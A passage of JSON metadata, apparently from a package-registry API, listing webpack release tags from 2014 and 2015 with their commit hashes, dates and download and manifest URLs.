yste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/r